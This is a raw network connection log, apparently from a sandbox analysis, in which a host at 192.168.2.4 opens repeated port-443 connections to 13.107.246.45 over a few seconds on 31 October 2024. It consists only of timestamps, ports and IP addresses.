Oct 31, 2024 19:20:35.403549910 CET	51430	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.403723955 CET	51430	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.403743029 CET	443	51430	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.404892921 CET	443	51426	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.404970884 CET	443	51426	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.405021906 CET	51426	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.405107021 CET	51426	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.405123949 CET	443	51426	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.405134916 CET	51426	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.405139923 CET	443	51426	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.407362938 CET	51431	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.407413006 CET	443	51431	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.407491922 CET	51431	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.407633066 CET	51431	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.407646894 CET	443	51431	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.008708954 CET	443	51429	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.009232998 CET	51429	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.009252071 CET	443	51429	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.009563923 CET	443	51428	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.009776115 CET	51429	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.009784937 CET	443	51429	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.009805918 CET	51428	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.009824038 CET	443	51428	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.010231972 CET	51428	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.010236979 CET	443	51428	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.041512966 CET	443	51427	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.042085886 CET	51427	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.042120934 CET	443	51427	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.042546988 CET	51427	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.042553902 CET	443	51427	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.156053066 CET	443	51429	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.156220913 CET	443	51429	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.156272888 CET	51429	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.156413078 CET	51429	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.156424999 CET	443	51429	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.156436920 CET	51429	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.156441927 CET	443	51429	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.159579992 CET	443	51428	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.159745932 CET	443	51428	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.159806967 CET	51428	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.159879923 CET	51432	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.159928083 CET	443	51432	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.159996033 CET	51432	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.160247087 CET	51428	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.160268068 CET	443	51428	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.160285950 CET	51432	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.160286903 CET	51428	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.160293102 CET	443	51428	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.160306931 CET	443	51432	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.161242962 CET	443	51430	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.161662102 CET	51430	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.161679983 CET	443	51430	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.162349939 CET	51430	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.162357092 CET	443	51430	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.163053036 CET	51433	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.163100958 CET	443	51433	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.163171053 CET	51433	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.163269043 CET	51433	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.163286924 CET	443	51433	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.163969994 CET	443	51431	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.164216042 CET	51431	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.164233923 CET	443	51431	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.164594889 CET	51431	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.164599895 CET	443	51431	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.179263115 CET	443	51427	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.179348946 CET	443	51427	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.179420948 CET	51427	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.179497957 CET	51427	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.179497957 CET	51427	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.179538965 CET	443	51427	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.179569006 CET	443	51427	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.181904078 CET	51434	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.181929111 CET	443	51434	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.181998968 CET	51434	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.182121038 CET	51434	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.182135105 CET	443	51434	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.295329094 CET	443	51430	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.295614004 CET	443	51430	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.295682907 CET	51430	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.295705080 CET	51430	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.295717955 CET	443	51430	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.295727968 CET	51430	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.295732975 CET	443	51430	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.298732042 CET	51435	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.298773050 CET	443	51435	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.298861980 CET	51435	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.299083948 CET	51435	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.299099922 CET	443	51435	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.299931049 CET	443	51431	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.299972057 CET	443	51431	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.300025940 CET	443	51431	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.300030947 CET	51431	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.300071001 CET	51431	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.300250053 CET	51431	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.300263882 CET	443	51431	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.300292015 CET	51431	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.300297022 CET	443	51431	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.302608013 CET	51436	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.302639008 CET	443	51436	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.302733898 CET	51436	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.302891016 CET	51436	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.302906036 CET	443	51436	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.887799025 CET	443	51432	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.903739929 CET	51432	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.903779030 CET	443	51432	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.904124975 CET	51432	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.904134035 CET	443	51432	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.916779041 CET	443	51433	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.920461893 CET	51433	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.920484066 CET	443	51433	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.921025038 CET	51433	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.921031952 CET	443	51433	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.930124044 CET	443	51434	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.950592995 CET	51434	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.950608969 CET	443	51434	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:36.954991102 CET	51434	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:36.954996109 CET	443	51434	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.027800083 CET	443	51432	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.027888060 CET	443	51432	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.027992010 CET	51432	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.028331995 CET	51432	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.028331995 CET	51432	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.028347969 CET	443	51432	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.028357029 CET	443	51432	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.030807018 CET	443	51435	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.037486076 CET	443	51436	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.057846069 CET	443	51433	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.058387995 CET	443	51433	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.058487892 CET	443	51433	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.058562040 CET	51433	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.058562040 CET	51433	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.060067892 CET	51435	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.060077906 CET	443	51435	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.067488909 CET	51435	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.067495108 CET	443	51435	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.075134039 CET	51436	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.075145960 CET	443	51436	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.081635952 CET	443	51434	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.081717968 CET	443	51434	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.081782103 CET	51434	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.082303047 CET	51436	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.082309008 CET	443	51436	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.082437992 CET	51434	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.082448006 CET	443	51434	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.082479954 CET	51434	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.082484961 CET	443	51434	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.086028099 CET	51433	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.086046934 CET	443	51433	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.086076021 CET	51433	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.086081982 CET	443	51433	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.130017996 CET	51437	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.130058050 CET	443	51437	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.130131960 CET	51437	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.130553961 CET	51438	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.130593061 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.130645037 CET	51438	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.131292105 CET	51439	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.131321907 CET	443	51439	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.131367922 CET	51439	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.131458998 CET	51437	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.131479979 CET	443	51437	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.131584883 CET	51438	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.131602049 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.131644964 CET	51439	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.131654978 CET	443	51439	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.195215940 CET	443	51435	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.195244074 CET	443	51435	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.195291996 CET	443	51435	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.195333958 CET	51435	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.195363998 CET	51435	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.195610046 CET	51435	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.195610046 CET	51435	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.195631027 CET	443	51435	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.195640087 CET	443	51435	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.198690891 CET	51440	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.198728085 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.198841095 CET	51440	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.198977947 CET	51440	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.198991060 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.222888947 CET	443	51436	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.222981930 CET	443	51436	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.223052979 CET	51436	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.223298073 CET	51436	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.223298073 CET	51436	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.223320961 CET	443	51436	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.223330975 CET	443	51436	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.226444006 CET	51441	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.226475954 CET	443	51441	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.226562977 CET	51441	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.226747036 CET	51441	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.226763010 CET	443	51441	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.861443043 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.862122059 CET	51438	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.862138987 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.862654924 CET	51438	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.862660885 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.866543055 CET	443	51437	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.866847992 CET	51437	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.866863012 CET	443	51437	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.867160082 CET	51437	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.867166996 CET	443	51437	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.875221014 CET	443	51439	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.875526905 CET	51439	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.875538111 CET	443	51439	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.875885963 CET	51439	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.875893116 CET	443	51439	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.965383053 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.965944052 CET	51440	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.965959072 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.966464043 CET	51440	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.966470003 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.974652052 CET	443	51441	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.975100994 CET	51441	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.975116014 CET	443	51441	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.975519896 CET	51441	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.975526094 CET	443	51441	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.989586115 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.989670992 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.989742041 CET	51438	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.989756107 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.989800930 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.989857912 CET	51438	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.990017891 CET	51438	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.990046024 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.990056992 CET	51438	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.990062952 CET	443	51438	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.993171930 CET	51442	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.993215084 CET	443	51442	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.993325949 CET	51442	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.993556976 CET	51442	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.993570089 CET	443	51442	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.998085022 CET	443	51437	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.998109102 CET	443	51437	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.998172998 CET	51437	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.998173952 CET	443	51437	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.998235941 CET	51437	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.998348951 CET	51437	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.998348951 CET	51437	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:37.998366117 CET	443	51437	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:37.998377085 CET	443	51437	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.001008034 CET	51443	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.001036882 CET	443	51443	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.001113892 CET	51443	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.001271009 CET	51443	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.001286030 CET	443	51443	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.010149956 CET	443	51439	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.010384083 CET	443	51439	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.010474920 CET	51439	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.010474920 CET	51439	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.010500908 CET	51439	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.010515928 CET	443	51439	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.013133049 CET	51444	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.013163090 CET	443	51444	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.013237000 CET	51444	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.013422966 CET	51444	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.013437986 CET	443	51444	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.101731062 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.101753950 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.101919889 CET	51440	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.101936102 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.102209091 CET	51440	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.102219105 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.102236986 CET	51440	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.102385044 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.102417946 CET	443	51440	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.102524996 CET	51440	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.105588913 CET	51445	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.105640888 CET	443	51445	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.106537104 CET	51445	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.106537104 CET	51445	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.106580973 CET	443	51445	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.126576900 CET	443	51441	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.126609087 CET	443	51441	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.126662016 CET	443	51441	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.126693964 CET	51441	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.126744032 CET	51441	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.127022982 CET	51441	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.127037048 CET	443	51441	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.127048016 CET	51441	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.127054930 CET	443	51441	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.129961967 CET	51446	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.130000114 CET	443	51446	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.130105019 CET	51446	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.130245924 CET	51446	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.130273104 CET	443	51446	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.747735977 CET	443	51442	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.748274088 CET	51442	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.748287916 CET	443	51442	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.748743057 CET	51442	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.748749971 CET	443	51442	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.753340960 CET	443	51444	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.753999949 CET	51444	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.754021883 CET	443	51444	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.755999088 CET	51444	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.756016016 CET	443	51444	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.772414923 CET	443	51443	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.772860050 CET	51443	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.772881031 CET	443	51443	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.773375034 CET	51443	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.773382902 CET	443	51443	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.857285976 CET	443	51445	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.857873917 CET	51445	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.857887030 CET	443	51445	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.858392000 CET	51445	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.858397961 CET	443	51445	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.862644911 CET	443	51446	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.863198042 CET	51446	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.863212109 CET	443	51446	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.863466978 CET	51446	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.863471985 CET	443	51446	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.877796888 CET	443	51442	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.877876043 CET	443	51442	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.877938986 CET	51442	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.878163099 CET	51442	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.878176928 CET	443	51442	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.878187895 CET	51442	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.878194094 CET	443	51442	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.881202936 CET	51447	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.881242990 CET	443	51447	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.881329060 CET	51447	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.881491899 CET	51447	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.881509066 CET	443	51447	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.885212898 CET	443	51444	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.886023998 CET	443	51444	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.886092901 CET	51444	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.886133909 CET	51444	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.886145115 CET	443	51444	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.886158943 CET	51444	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.886163950 CET	443	51444	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.888279915 CET	51448	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.888319969 CET	443	51448	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.888394117 CET	51448	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.888515949 CET	51448	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.888530970 CET	443	51448	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.915359974 CET	443	51443	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.915390015 CET	443	51443	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.915433884 CET	443	51443	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.915517092 CET	51443	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.915555954 CET	51443	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.915638924 CET	51443	443	192.168.2.4	13.107.246.45
